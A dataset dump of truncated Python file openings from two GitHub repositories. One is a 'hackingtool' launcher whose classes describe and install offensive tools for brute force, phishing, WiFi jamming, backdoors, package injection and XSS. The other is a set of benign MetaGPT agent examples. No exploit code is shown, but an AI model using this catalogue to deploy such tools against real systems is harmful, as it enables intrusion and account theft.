from core import HackingTool, HackingToolsCollection, console from rich.panel import Panel from rich.prompt import Prompt from rich import box class EvilURL(HackingTool): TITLE = "EvilURL" DESCRIPTION = "Generate unicode evil domains for IDN Homograph Attack " \ "and detect them." INSTA...
Z4nzu/hackingtool
https://github.com/Z4nzu/hackingtool
null
null
null
null
70,876
null
null
mit
null
null
null
null
null
null
null
tools/others/socialmedia.py
null
null
null
null
null
null
Python
2026-05-04T02:17:07.869842
import contextlib import os import subprocess from core import HackingTool, HackingToolsCollection, console from rich.panel import Panel from rich.prompt import Prompt from rich import box class InstaBrute(HackingTool): TITLE = "Instagram Attack" DESCRIPTION = "Brute force attack against Instagram" PROJ...
Z4nzu/hackingtool
https://github.com/Z4nzu/hackingtool
null
null
null
null
70,876
null
null
mit
null
null
null
null
null
null
null
tools/others/mix_tools.py
null
null
null
null
null
null
Python
2026-05-04T02:17:08.099672
from core import HackingTool, HackingToolsCollection, console from rich.panel import Panel from rich.prompt import Prompt from rich import box class TerminalMultiplexer(HackingTool): TITLE = "Terminal Multiplexer" DESCRIPTION = ( "Terminal Multiplexer (tilix) is a tiling terminal emulator that " ...
Z4nzu/hackingtool
https://github.com/Z4nzu/hackingtool
null
null
null
null
70,876
null
null
mit
null
null
null
null
null
null
null
tools/others/web_crawling.py
null
null
null
null
null
null
Python
2026-05-04T02:17:08.163638
from core import HackingTool, HackingToolsCollection, console from rich.panel import Panel from rich.prompt import Prompt from rich import box class GoSpider(HackingTool): TITLE = "Gospider" DESCRIPTION = "Gospider - Fast web spider written in Go" INSTALL_COMMANDS = ["sudo go get -u github.com/jaeles-pro...
Z4nzu/hackingtool
https://github.com/Z4nzu/hackingtool
null
null
null
null
70,876
null
null
mit
null
null
null
null
null
null
null
tools/others/payload_injection.py
null
null
null
null
null
null
Python
2026-05-04T02:17:08.648963
from core import HackingTool, HackingToolsCollection, console from rich.panel import Panel from rich.prompt import Prompt from rich import box class DebInject(HackingTool): TITLE = "Debinject" DESCRIPTION = "Debinject is a tool that inject malicious code into *.debs" INSTALL_COMMANDS = [ "git clo...
Z4nzu/hackingtool
https://github.com/Z4nzu/hackingtool
null
null
null
null
70,876
null
null
mit
null
null
null
null
null
null
null
tools/others/socialmedia_finder.py
null
null
null
null
null
null
Python
2026-05-04T02:17:08.650478
import os import subprocess from core import HackingTool, HackingToolsCollection, console from rich.panel import Panel from rich.prompt import Prompt from rich import box class FacialFind(HackingTool): TITLE = "Find SocialMedia By Facial Recognation System" DESCRIPTION = "A Social Media Mapping Tool that co...
Z4nzu/hackingtool
https://github.com/Z4nzu/hackingtool
null
null
null
null
70,876
null
null
mit
null
null
null
null
null
null
null
tools/others/wifi_jamming.py
null
null
null
null
null
null
Python
2026-05-04T02:17:08.651529
from core import HackingTool, HackingToolsCollection, console from rich.panel import Panel from rich.prompt import Prompt from rich import box class WifiJammerNG(HackingTool): TITLE = "WifiJammer-NG" DESCRIPTION = "Continuously jam all wifi clients and access points within range." SUPPORTED_OS = ["linux"...
Z4nzu/hackingtool
https://github.com/Z4nzu/hackingtool
null
null
null
null
70,876
null
null
mit
null
null
null
null
null
null
null
tools/phishing_attack.py
null
null
null
null
null
null
Python
2026-05-04T02:17:08.652775
import os from core import HackingTool, HackingToolsCollection, console class Autophisher(HackingTool): TITLE = "Autophisher RK" SUPPORTED_OS = ["linux"] DESCRIPTION = "Automated Phishing Toolkit" INSTALL_COMMANDS = [ "git clone https://github.com/CodingRanjith/autophisher.git", ] RUN...
Z4nzu/hackingtool
https://github.com/Z4nzu/hackingtool
null
null
null
null
70,876
null
null
mit
null
null
null
null
null
null
null
tools/remote_administration.py
null
null
null
null
null
null
Python
2026-05-04T02:17:09.045759
from core import HackingTool, HackingToolsCollection, console from rich.panel import Panel from rich.prompt import Prompt # Bug 17 fix: Stitch was defined in both payload_creator.py and remote_administration.py. # It is kept in payload_creator.py (its correct category) and removed from here. class Pyshell(HackingT...
Z4nzu/hackingtool
https://github.com/Z4nzu/hackingtool
null
null
null
null
70,876
null
null
mit
null
null
null
null
null
null
null
tools/post_exploitation.py
null
null
null
null
null
null
Python
2026-05-04T02:17:09.057517
import os from core import HackingTool, HackingToolsCollection, console from rich.panel import Panel from rich.prompt import Prompt class Vegile(HackingTool): TITLE = "Vegile - Ghost In The Shell" SUPPORTED_OS = ["linux"] DESCRIPTION = "This tool will set up your backdoor/rootkits when " \ ...
Z4nzu/hackingtool
https://github.com/Z4nzu/hackingtool
null
null
null
null
70,876
null
null
mit
null
null
null
null
null
null
null
tools/steganography.py
null
null
null
null
null
null
Python
2026-05-04T02:17:09.194655
import subprocess from core import HackingTool, HackingToolsCollection, console from core import validate_input from rich.panel import Panel from rich.prompt import Prompt class SteganoHide(HackingTool): TITLE = "SteganoHide" INSTALL_COMMANDS = ["sudo apt-get install steghide -y"] def run(self): ...
Z4nzu/hackingtool
https://github.com/Z4nzu/hackingtool
null
null
null
null
70,876
null
null
mit
null
null
null
null
null
null
null
tools/reverse_engineering.py
null
null
null
null
null
null
Python
2026-05-04T02:17:09.278095
import subprocess from core import HackingTool, HackingToolsCollection, console from rich.panel import Panel from rich.prompt import Prompt class AndroGuard(HackingTool): TITLE = "Androguard" DESCRIPTION = "Androguard is a Reverse engineering, Malware and goodware " \ "analysis of Android ...
Z4nzu/hackingtool
https://github.com/Z4nzu/hackingtool
null
null
null
null
70,876
null
null
mit
null
null
null
null
null
null
null
tools/sql_injection.py
null
null
null
null
null
null
Python
2026-05-04T02:17:09.278638
from core import HackingTool, HackingToolsCollection, console from rich.panel import Panel from rich.prompt import Prompt class Sqlmap(HackingTool): TITLE = "Sqlmap tool" DESCRIPTION = "sqlmap is an open source penetration testing tool that " \ "automates the process of detecting and exploi...
Z4nzu/hackingtool
https://github.com/Z4nzu/hackingtool
null
null
null
null
70,876
null
null
mit
null
null
null
null
null
null
null
tools/wireless_attack.py
null
null
null
null
null
null
Python
2026-05-04T02:17:09.438603
from rich.prompt import Prompt from core import HackingTool, HackingToolsCollection, console class WIFIPumpkin(HackingTool): TITLE = "WiFi-Pumpkin" DESCRIPTION = ( "The WiFi-Pumpkin is a rogue AP framework to easily create fake networks\n" "while forwarding legitimate traffic to and from the ...
Z4nzu/hackingtool
https://github.com/Z4nzu/hackingtool
null
null
null
null
70,876
null
null
mit
null
null
null
null
null
null
null
tools/web_attack.py
null
null
null
null
null
null
Python
2026-05-04T02:17:09.455571
import subprocess from core import HackingTool, HackingToolsCollection, console from rich.panel import Panel from rich.prompt import Prompt class Web2Attack(HackingTool): TITLE = "Web2Attack" DESCRIPTION = "Web hacking framework with tools, exploits by python" INSTALL_COMMANDS = [ "git clone http...
Z4nzu/hackingtool
https://github.com/Z4nzu/hackingtool
null
null
null
null
70,876
null
null
mit
null
null
null
null
null
null
null
tools/wordlist_generator.py
null
null
null
null
null
null
Python
2026-05-04T02:17:09.456361
import os import subprocess from rich.panel import Panel from rich.prompt import Prompt from rich.table import Table from rich import box from core import HackingTool, HackingToolsCollection, console class Cupp(HackingTool): TITLE = "Cupp" # Bug 24 fix: DESCRIPTION was copy-pasted from WlCreator — completel...
Z4nzu/hackingtool
https://github.com/Z4nzu/hackingtool
null
null
null
null
70,876
null
null
mit
null
null
null
null
null
null
null
tools/tool_manager.py
null
null
null
null
null
null
Python
2026-05-04T02:17:09.476657
import os import sys import subprocess from time import sleep from rich.prompt import Confirm from core import HackingTool, HackingToolsCollection, console from constants import APP_INSTALL_DIR, APP_BIN_PATH, USER_CONFIG_DIR, REPO_URL class UpdateTool(HackingTool): TITLE = "Update Tool or System" DESCRIPTIO...
Z4nzu/hackingtool
https://github.com/Z4nzu/hackingtool
null
null
null
null
70,876
null
null
mit
null
null
null
null
null
null
null
tools/payload_creator.py
null
null
null
null
null
null
Python
2026-05-04T02:17:09.810478
import os import subprocess from core import HackingTool, HackingToolsCollection, console class TheFatRat(HackingTool): TITLE = "The FatRat" SUPPORTED_OS = ["linux"] DESCRIPTION = ( "TheFatRat provides an easy way to create backdoors and payloads " "which can bypass most anti-virus." ...
Z4nzu/hackingtool
https://github.com/Z4nzu/hackingtool
null
null
null
null
70,876
null
null
mit
null
null
null
null
null
null
null
tools/xss_attack.py
null
null
null
null
null
null
Python
2026-05-04T02:17:09.881109
import os import subprocess from rich.panel import Panel from rich.prompt import Prompt from core import HackingTool, HackingToolsCollection, console class Dalfox(HackingTool): TITLE = "DalFox (Finder of XSS)" DESCRIPTION = "XSS Scanning and Parameter Analysis tool." INSTALL_COMMANDS = [ "sudo ap...
FoundationAgents/MetaGPT
https://github.com/FoundationAgents/MetaGPT
null
null
null
null
67,657
null
null
mit
null
null
null
null
null
null
null
examples/cr.py
null
null
null
null
null
null
Python
2026-05-04T02:17:17.117823
import fire from metagpt.roles.di.engineer2 import Engineer2 from metagpt.tools.libs.cr import CodeReview async def main(msg): role = Engineer2(tools=["Plan", "Editor:write,read", "RoleZero", "ValidateAndRewriteCode", "CodeReview"]) cr = CodeReview() role.tool_execution_map.update({"CodeReview.review": c...
FoundationAgents/MetaGPT
https://github.com/FoundationAgents/MetaGPT
null
null
null
null
67,657
null
null
mit
null
null
null
null
null
null
null
examples/build_customized_agent.py
null
null
null
null
null
null
Python
2026-05-04T02:17:17.130518
""" Filename: MetaGPT/examples/build_customized_agent.py Created Date: Tuesday, September 19th 2023, 6:52:25 pm Author: garylin2099 """ import asyncio import re import subprocess import fire from metagpt.actions import Action from metagpt.logs import logger from metagpt.roles.role import Role, RoleReactMode from meta...
FoundationAgents/MetaGPT
https://github.com/FoundationAgents/MetaGPT
null
null
null
null
67,657
null
null
mit
null
null
null
null
null
null
null
examples/aflow/optimize.py
null
null
null
null
null
null
Python
2026-05-04T02:17:17.131118
# -*- coding: utf-8 -*- # @Date : 8/23/2024 20:00 PM # @Author : didi # @Desc : Entrance of AFlow. import argparse from typing import Dict, List from metagpt.configs.models_config import ModelsConfig from metagpt.ext.aflow.data.download_data import download from metagpt.ext.aflow.scripts.optimizer import Optim...
FoundationAgents/MetaGPT
https://github.com/FoundationAgents/MetaGPT
null
null
null
null
67,657
null
null
mit
null
null
null
null
null
null
null
examples/debate_simple.py
null
null
null
null
null
null
Python
2026-05-04T02:17:17.139256
#!/usr/bin/env python # -*- coding: utf-8 -*- """ @Time : 2023/12/22 @Author : alexanderwu @File : debate_simple.py """ import asyncio from metagpt.actions import Action from metagpt.config2 import Config from metagpt.environment import Environment from metagpt.roles import Role from metagpt.team import Team g...
FoundationAgents/MetaGPT
https://github.com/FoundationAgents/MetaGPT
null
null
null
null
67,657
null
null
mit
null
null
null
null
null
null
null
examples/debate.py
null
null
null
null
null
null
Python
2026-05-04T02:17:17.139844
""" Filename: MetaGPT/examples/debate.py Created Date: Tuesday, September 19th 2023, 6:52:25 pm Author: garylin2099 @Modified By: mashenquan, 2023-11-1. In accordance with Chapter 2.1.3 of RFC 116, modify the data type of the `send_to` value of the `Message` object; modify the argument type of `get_by_actions`....
FoundationAgents/MetaGPT
https://github.com/FoundationAgents/MetaGPT
null
null
null
null
67,657
null
null
mit
null
null
null
null
null
null
null
examples/agent_creator.py
null
null
null
null
null
null
Python
2026-05-04T02:17:17.141772
""" Filename: MetaGPT/examples/agent_creator.py Created Date: Tuesday, September 12th 2023, 3:28:37 pm Author: garylin2099 """ import re from metagpt.actions import Action from metagpt.config2 import config from metagpt.const import METAGPT_ROOT from metagpt.logs import logger from metagpt.roles import Role from metag...
FoundationAgents/MetaGPT
https://github.com/FoundationAgents/MetaGPT
null
null
null
null
67,657
null
null
mit
null
null
null
null
null
null
null
examples/di/InfiAgent-DABench/DABench.py
null
null
null
null
null
null
Python
2026-05-04T02:17:17.150740
import asyncio import json import re from pathlib import Path from typing import Any, Dict, List, Tuple, Union import nest_asyncio from examples.di.requirements_prompt import DABENCH from metagpt.const import DABENCH_PATH from metagpt.logs import logger from metagpt.utils.exceptions import handle_exception def eval...
FoundationAgents/MetaGPT
https://github.com/FoundationAgents/MetaGPT
null
null
null
null
67,657
null
null
mit
null
null
null
null
null
null
null
examples/build_customized_multi_agents.py
null
null
null
null
null
null
Python
2026-05-04T02:17:17.151855
""" Filename: MetaGPT/examples/build_customized_multi_agents.py Created Date: Wednesday, November 15th 2023, 7:12:39 pm Author: garylin2099 """ import re import fire from metagpt.actions import Action, UserRequirement from metagpt.logs import logger from metagpt.roles import Role from metagpt.schema import Message fr...
FoundationAgents/MetaGPT
https://github.com/FoundationAgents/MetaGPT
null
null
null
null
67,657
null
null
mit
null
null
null
null
null
null
null
examples/dalle_gpt4v_agent.py
null
null
null
null
null
null
Python
2026-05-04T02:17:17.181780
#!/usr/bin/env python # -*- coding: utf-8 -*- # @Desc : use gpt4v to improve prompt and draw image with dall-e-3 """set `model: "gpt-4-vision-preview"` in `config2.yaml` first""" import asyncio from PIL import Image from metagpt.actions.action import Action from metagpt.logs import logger from metagpt.roles.role ...
FoundationAgents/MetaGPT
https://github.com/FoundationAgents/MetaGPT
null
null
null
null
67,657
null
null
mit
null
null
null
null
null
null
null
examples/android_assistant/run_assistant.py
null
null
null
null
null
null
Python
2026-05-04T02:17:17.213146
#!/usr/bin/env python # -*- coding: utf-8 -*- # @Desc : the entry of android assistant including learning and acting stage # See the usage README inside `metagpt/ext/android_assistant` # README see `metagpt/ext/android_assistant/README.md` import asyncio from pathlib import Path import typer fr...
FoundationAgents/MetaGPT
https://github.com/FoundationAgents/MetaGPT
null
null
null
null
67,657
null
null
mit
null
null
null
null
null
null
null
examples/di/InfiAgent-DABench/run_InfiAgent-DABench_single.py
null
null
null
null
null
null
Python
2026-05-04T02:17:17.973643
import fire from DABench import DABench from metagpt.logs import logger from metagpt.roles.di.data_interpreter import DataInterpreter from metagpt.utils.recovery_util import save_history async def main(id=0): """Evaluate one task""" bench = DABench() requirement = bench.generate_formatted_prompt(id) ...
FoundationAgents/MetaGPT
https://github.com/FoundationAgents/MetaGPT
null
null
null
null
67,657
null
null
mit
null
null
null
null
null
null
null
examples/di/InfiAgent-DABench/run_InfiAgent-DABench.py
null
null
null
null
null
null
Python
2026-05-04T02:17:17.974171
import asyncio import json from DABench import DABench from metagpt.logs import logger from metagpt.roles.di.data_interpreter import DataInterpreter async def get_prediction(agent, requirement): """Helper function to obtain a prediction from a new instance of the agent. This function runs the agent with th...
FoundationAgents/MetaGPT
https://github.com/FoundationAgents/MetaGPT
null
null
null
null
67,657
null
null
mit
null
null
null
null
null
null
null
examples/di/atomization_capacity_plan.py
null
null
null
null
null
null
Python
2026-05-04T02:17:17.976105
import fire from metagpt.logs import logger from metagpt.roles.di.team_leader import TeamLeader async def main(): tl = TeamLeader() logger.info("\n=== Adding Initial Tasks ===") tl.planner.plan.append_task( task_id="T1", dependent_task_ids=[], instruction="Create Product Requirements Document (PR...
FoundationAgents/MetaGPT
https://github.com/FoundationAgents/MetaGPT
null
null
null
null
67,657
null
null
mit
null
null
null
null
null
null
null
examples/di/InfiAgent-DABench/run_InfiAgent-DABench_all.py
null
null
null
null
null
null
Python
2026-05-04T02:17:17.977292
import fire import pandas as pd from DABench import DABench from metagpt.logs import logger from metagpt.roles.di.data_interpreter import DataInterpreter from metagpt.utils.recovery_util import save_history async def main(): """Evaluate all""" bench = DABench() id_list, predictions, labels, is_true = [],...
FoundationAgents/MetaGPT
https://github.com/FoundationAgents/MetaGPT
null
null
null
null
67,657
null
null
mit
null
null
null
null
null
null
null
examples/di/arxiv_reader.py
null
null
null
null
null
null
Python
2026-05-04T02:17:18.171631
#!/usr/bin/env python # -*- coding: utf-8 -*- from metagpt.roles.di.data_interpreter import DataInterpreter from metagpt.tools.libs.web_scraping import view_page_element_to_scrape async def main(): template = "https://arxiv.org/list/{tag}/pastweek?skip=0&show=300" tags = ["cs.ai", "cs.cl", "cs.lg", "cs.se"] ...
FoundationAgents/MetaGPT
https://github.com/FoundationAgents/MetaGPT
null
null
null
null
67,657
null
null
mit
null
null
null
null
null
null
null
examples/di/data_visualization.py
null
null
null
null
null
null
Python
2026-05-04T02:17:18.194570
import asyncio from metagpt.logs import logger from metagpt.roles.di.data_interpreter import DataInterpreter from metagpt.utils.recovery_util import save_history async def main(requirement: str = ""): di = DataInterpreter() rsp = await di.run(requirement) logger.info(rsp) save_history(role=di) if _...
FoundationAgents/MetaGPT
https://github.com/FoundationAgents/MetaGPT
null
null
null
null
67,657
null
null
mit
null
null
null
null
null
null
null
examples/di/data_analyst_write_code.py
null
null
null
null
null
null
Python
2026-05-04T02:17:18.195264
import fire from metagpt.logs import logger from metagpt.roles.di.data_analyst import DataAnalyst async def main(): # Create an instance of DataAnalyst role analyst = DataAnalyst() # Set the main goal for the planner - constructing a 2D array analyst.planner.plan.goal = "construct a two-dimensional ...
FoundationAgents/MetaGPT
https://github.com/FoundationAgents/MetaGPT
null
null
null
null
67,657
null
null
mit
null
null
null
null
null
null
null
examples/di/automated_planning_of_tasks.py
null
null
null
null
null
null
Python
2026-05-04T02:17:18.377898
import fire from metagpt.logs import logger from metagpt.roles.di.team_leader import TeamLeader async def main(): # Create an instance of TeamLeader tl = TeamLeader() # Update the plan with the goal to create a 2048 game # This will auto generate tasks needed to accomplish the goal await tl.plan...
FoundationAgents/MetaGPT
https://github.com/FoundationAgents/MetaGPT
null
null
null
null
67,657
null
null
mit
null
null
null
null
null
null
null
examples/di/fix_github_issue.py
null
null
null
null
null
null
Python
2026-05-04T02:17:18.583955
"""This example is from a real issue from MetaGPT: https://github.com/geekan/MetaGPT/issues/1067 with corresponding bugfix as https://github.com/geekan/MetaGPT/pull/1069 We demonstrate that DataInterpreter has the capability to fix such issues. Prerequisite: You need to manually add the bug back to your local file meta...
FoundationAgents/MetaGPT
https://github.com/FoundationAgents/MetaGPT
null
null
null
null
67,657
null
null
mit
null
null
null
null
null
null
null
examples/di/imitate_webpage.py
null
null
null
null
null
null
Python
2026-05-04T02:17:18.585146
#!/usr/bin/env python # -*- coding: utf-8 -*- """ @Time : 2024/01/15 @Author : mannaandpoem @File : imitate_webpage.py """ from metagpt.roles.di.data_interpreter import DataInterpreter async def main(): web_url = "https://pytorch.org/" prompt = f"""This is a URL of webpage: '{web_url}' . Firstly, open ...
FoundationAgents/MetaGPT
https://github.com/FoundationAgents/MetaGPT
null
null
null
null
67,657
null
null
mit
null
null
null
null
null
null
null
examples/di/email_summary.py
null
null
null
null
null
null
Python
2026-05-04T02:17:18.608140
# -*- encoding: utf-8 -*- """ @Date : 2024/02/07 @Author : Tuo Zhou @File : email_summary.py """ import os from metagpt.roles.di.data_interpreter import DataInterpreter async def main(): email_account = "your_email_account" # your password will stay only on your device and not go to LLM api ...
FoundationAgents/MetaGPT
https://github.com/FoundationAgents/MetaGPT
null
null
null
null
67,657
null
null
mit
null
null
null
null
null
null
null
examples/di/interacting_with_human.py
null
null
null
null
null
null
Python
2026-05-04T02:17:18.696052
import fire from metagpt.environment.mgx.mgx_env import MGXEnv from metagpt.logs import logger from metagpt.roles.di.team_leader import TeamLeader from metagpt.schema import Message async def main(): # Initialize the MetaGPT environment env = MGXEnv() # Add a TeamLeader role to the environment env.ad...
FoundationAgents/MetaGPT
https://github.com/FoundationAgents/MetaGPT
null
null
null
null
67,657
null
null
mit
null
null
null
null
null
null
null
examples/di/ocr_receipt.py
null
null
null
null
null
null
Python
2026-05-04T02:17:18.807831
from metagpt.const import EXAMPLE_DATA_PATH from metagpt.roles.di.data_interpreter import DataInterpreter async def main(): # Notice: pip install metagpt[ocr] before using this example image_path = EXAMPLE_DATA_PATH / "di/receipt_shopping.jpg" language = "English" requirement = f"""This is a {language...
FoundationAgents/MetaGPT
https://github.com/FoundationAgents/MetaGPT
null
null
null
null
67,657
null
null
mit
null
null
null
null
null
null
null
examples/di/machine_learning.py
null
null
null
null
null
null
Python
2026-05-04T02:17:18.809204
import fire from metagpt.roles.di.data_interpreter import DataInterpreter WINE_REQ = "Run data analysis on sklearn Wine recognition dataset, include a plot, and train a model to predict wine class (20% as validation), and show validation accuracy." DATA_DIR = "path/to/your/data" # sales_forecast data from https://ww...